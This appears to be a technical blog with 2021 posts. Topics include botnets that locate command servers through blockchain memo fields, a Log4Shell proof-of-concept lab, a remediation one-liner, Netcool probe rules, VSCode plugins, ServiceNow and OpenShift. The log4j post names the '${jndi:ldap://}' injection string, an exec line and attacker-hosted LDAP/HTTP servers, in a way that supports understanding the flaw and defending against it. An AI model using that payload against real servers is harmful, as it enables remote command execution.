Tuesday, December 14, 2021

Interesting article on the new frontier of botnets identifying C2 servers using "memo" data in blockchain transactions between known wallets

 The title tells you the gist of the story, but here's the full article:


Basically, the botnet code is written such that if its current C2 (Command and Control) server is down, it will search the public blockchain for transactions between known wallets. Every transaction can have an optional "memo" field, which is where the botnet controllers put the address of other C2 servers.

Example and video of log4j2 exploit

 This is a great example of the exploit in action:


Here's the video showing it in action:


You can run it yourself. On Linux, you'll first have to install the following prereqs:


And you'll also need to modify Main.java before compiling to change the line:

Runtime.getRuntime().exec("cmd.exe /c start echo Exploit");



The pieces that are provided for the exploit are:

- An HTTP server that would be owned by the attacker in the wild. This hosts the Main.class file that is going to display a new window on the server when the exploit fires.
- An LDAP server that would be owned by the attacker in the wild. This is the server queried by the vulnerable JndiLookup.class file, which includes a link to the HTTP server.
- A JVM that represents an application server like WebSphere or Tomcat

Once you feed the JVM the userr-controlled string "${jndi:ldap://}", you'll see that the JVM spits out errors, but still successfully opens a new window. In the wild, this window represents ANY COMMAND THE ATTACKER WANTS TO RUN ON THE SERVER, and it's running as the same userid that's running the JVM. 

Basically, if you didn't already know, this is the worst, and most easily exploited vulnerability that's been found in the wild in a long time.

Monday, December 13, 2021

Quickest log4j2 vulnerability remediation I've found on Linux

 Quickest Linux fix I've found for the #log4j2 vulnerability:

find / -name "log4j-core-*.jar" -exec zip -q -d {} org/apache/logging/log4j/core/lookup/JndiLookup.class \;

The above command will find all files named "log4j-core-*.jar" on the system and will remove the "JndiLookup.class" file from them. The 'reboot' is a fairly large hammer, but it will restart all processes on the box. Alternatively, you can stop and restart all java processes running on the server.

Tuesday, October 26, 2021

Converting timestamp in milliseconds to seconds in Netcool probe rules


The Netcool OMNIbus ObjectServer expects timestamp values to be the number of seconds since epoch (00:00:00 UTC on 1 January 1970). This is a 10-digit number. However, some systems generate a timestamp that is the number of milliseconds since epoch (a 13-digit number). This causes the timestamp to be interpreted wildly incorrectly in the ObjectServer. One such event source is Nokia NSP, which integrates with Netcool via the Probe for Message Bus.

Conversion Process

My process of converting the 13-digit timestamp to the correct 10-digit one is straightforward:

# convert timestamp to string by concatenating it with a string
$millString = $timestampInMilliseconds + ""

# take the first 10 characters
$secondsString = substr($millString,1,10)

# convert back to an integer
$validTimestamp = int($secondsString)

# store in FirstOccurrence of Event
@FirstOccurrence = $validTimestamp

That's it.

Wednesday, September 22, 2021

Using VSCode to write Netcool Probe Rules and Impact Policies

 VSCode is Microsoft's free, cross-platform IDE for software development. It is booming in popularity recently because it is an amazing tool with lots of plugins. These plugins provide all kinds of different functionality. The ones I want to introduce to you today are syntax highligting plugins that provide syntax highlighting and syntax validation for Impact Policy Language (IPL) and Netcool Probe Rules Language

Here's an example from the Probe Rules extension:

Compared to the vi editor or Notepad++, this is a HUGE improvement.

Wednesday, May 5, 2021

ServiceNow Quebec Release Netcool Connector V2 Implemented in JavaScript


Prior to the Quebec Release, the Netcool Connector was only available as a Groovy script. In the Quebec release, ServiceNow offers BOTH the legacy Groovy connector and a new JavaScript-based connector. This new connector is named IBM Netcool V2. This new connector leverages the OMNIbus REST API for retrieving and updating events, whereas the legacy Groovy script directly connects to the ObjectServer database to perform these operations.

Monday, March 22, 2021

vCenter Appliance "tiny" Size Is Not Enough for Creating OpenShift Cluster

 I just tried to create an OpenShift 4.7 cluster using a vCenter appliance that was configured with the "tiny" size from the installer. This gives it 2 vcpus and 10GB RAM. I was using Installer Provided Infrastructure (IPI) on vSphere 6.7. The cluster creation failed with a timeout. I looked at the vCenter server performance stats and saw that it was using all of its CPU and memory. So I destroyed the cluster and doubled the resources on the vCenter VM. I then ran the cluster creation again, and everything completed as expected.